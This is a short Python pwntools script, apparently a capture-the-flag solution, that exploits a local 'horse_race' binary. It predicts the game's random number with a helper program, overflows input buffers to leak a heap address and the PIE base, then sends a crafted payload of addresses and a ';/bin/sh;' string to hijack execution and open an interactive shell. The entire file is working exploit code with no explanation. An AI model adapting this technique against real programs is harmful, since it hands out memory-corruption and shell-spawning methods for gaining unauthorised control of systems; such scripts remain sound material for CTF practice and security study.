from pwn import *
import subprocess
s = process('/home/user/horse_race')
def rand():
        p = subprocess.Popen(["./get"], stdout=subprocess.PIPE)
        out = p.stdout.read()
        return int(out,10)
s.recvuntil('>')
s.send('2\n')
s.recvuntil('name :')
s.send('/bin/sh;\n')
s.recvuntil('>')
s.send('1\n')
answer = rand()
s.recvuntil(')')
s.send(str(answer+1)+'\n')
dat ='A'*100
s.recvuntil('input The thoughts of victory : ')
s.send(dat+'\n')
s.recvuntil('>')
s.send('3\n')
heap = u32(s.recvuntil('horse')[-5-4:-5])
log.info('HEAP : 0x%x'%heap)
s.recvuntil('>')
s.send('1\n')
answer = rand()
s.recvuntil(')')
s.send(str(answer+1)+'\n')
dat ='A'*(132-24)
s.recvuntil('input The thoughts of victory : ')
s.send(dat+'\n')
s.recvuntil('>')
s.send('3\n')
pie = u32(s.recvuntil('horse')[-5-4:-5]) - 0x1670
log.info('PIE : 0x%x'%pie)
s.recvuntil('>')
s.send('5\n')
s.recvuntil('Please describe the reason for the sale')
flag = ';/bin/sh;'
s.send(p32(heap+0x34)+flag+'A'*(0x30-len(flag))+p32(pie+0xc30))
#s.recvuntil('>')
#s.send('3\n')
s.interactive()
